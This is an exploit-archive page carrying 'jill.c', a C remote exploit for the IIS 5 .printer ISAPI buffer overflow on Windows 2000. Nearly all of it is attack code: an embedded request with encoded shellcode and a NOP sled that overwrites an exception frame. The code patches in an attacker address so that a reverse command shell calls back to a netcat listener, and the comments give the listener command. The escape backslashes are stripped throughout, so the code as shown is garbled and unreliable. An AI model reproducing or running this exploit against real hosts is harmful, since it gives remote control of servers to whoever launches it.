MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)
# Published : 2001-05-08
# Author : dark spyrit
# Previous Title : BSD (telnetd) Remote Root Exploit
# Next Title : BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
 *
 *  by: dark spyrit <dspyrit@beavuh.org>
 *
 *  respect to eeye for finding this one - nice work.
 *  shouts to halvar, neofight and the beavuh bitchez.
 *
 *  this exploit overwrites an exception frame to control eip and get to
 *  our code.. the code then locates the pointer to our larger buffer and
 *  execs.
 *
 *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
 *
 *  the shellcode spawns a reverse cmd shell.. so you need to set up a
 *  netcat listener on the host you control.
 *
 *  Ex: nc -l -p <attacker port> -vv
 *
 *  I haven't slept in years.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
  "x47x45x54x20x2fx4ex55x4cx4cx2ex70x72x69x6ex74x65x72x20"
  "x48x54x54x50x2fx31x2ex30x0dx0ax42x65x61x76x75x68x3ax20"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"
  "x8bxc5x33xc9x66xb9xd7x02x50x80x30x95x40xe2xfax2dx95x95"
  "x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"
  "xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"
  "xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"
  "x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"
  "xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"
  "x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"
  "x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"
  "x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"
  "x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"
  "x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"
  "x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"
  "xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"
  "xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"
  "xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"
  "xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"
  "x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"
  "x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"
  "x94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5"
  "xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"
  "xf3x52x92x97x95xf3x52xd2x97x8exacx52xd2x91x5ex38x4cxb3"
  "xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"
  "xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"
  "xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"
  "xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"
  "xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"
  "x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"
  "x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"
  "x1fxc6x6axc2x65xffx95x6axc2x75xa6x55x39x10x55xe0x6cxc4"
  "xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"
  "xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"
  "xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"
  "xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"
  "xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"
  "xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"
  "xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"
  "xc6xf9xf0xf0xe5x95xd0xedxfcxe1xc5xe7xfaxf6xf0xe6xe6x95"
  "xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"
  "xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"
  "xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"
  "xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"
  "xf0xedxf0x95x0dx0ax48x6fx73x74x3ax20x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x33"
  "xc0xb0x90x03xd8x8bx03x8bx40x60x33xdbxb3x24x03xc3xffxe0"
  "xebxb9x90x90x05x31x8cx6ax0dx0ax0dx0a";

  int       s;
  unsigned short int  a_port;
  unsigned long    a_host;
  struct hostent    *ht;
  struct sockaddr_in  sin;

  printf("iis5 remote .printer overflow.n"
    "dark spyrit <dspyrit@beavuh.org> / beavuh labs.n");

  if (argc != 5){
    printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>n",argv[0]);
    exit(1);
  }
  
  if ((ht = gethostbyname(argv[1])) == 0){
    herror(argv[1]);
    exit(1);
  }
  
  sin.sin_port = htons(atoi(argv[2]));
  a_port = htons(atoi(argv[4]));
  a_port^=0x9595;

  sin.sin_family = AF_INET;
  sin.sin_addr = *((struct in_addr *)ht->h_addr);
  
  if ((ht = gethostbyname(argv[3])) == 0){
    herror(argv[3]);
    exit(1);
  }
  
  a_host = *((unsigned long *)ht->h_addr);
  a_host^=0x95959595;

  sploit[441]= (a_port) & 0xff;
  sploit[442]= (a_port >> 8) & 0xff;

  sploit[446]= (a_host) & 0xff;
  sploit[447]= (a_host >> 8) & 0xff;
  sploit[448]= (a_host >> 16) & 0xff;
  sploit[449]= (a_host >> 24) & 0xff;

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    exit(1);
  }
  
  printf("nconnecting... n");
  if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
    perror("connect");
    exit(1);
  }
  
  write(s, sploit, strlen(sploit));
  sleep (1);
  close (s);
  
  printf("sent... nyou may need to send a carriage on your listener if the shell doesn't appear.nhave fun!n");
  exit(0);
}  


// www.Syue.com [2001-05-08]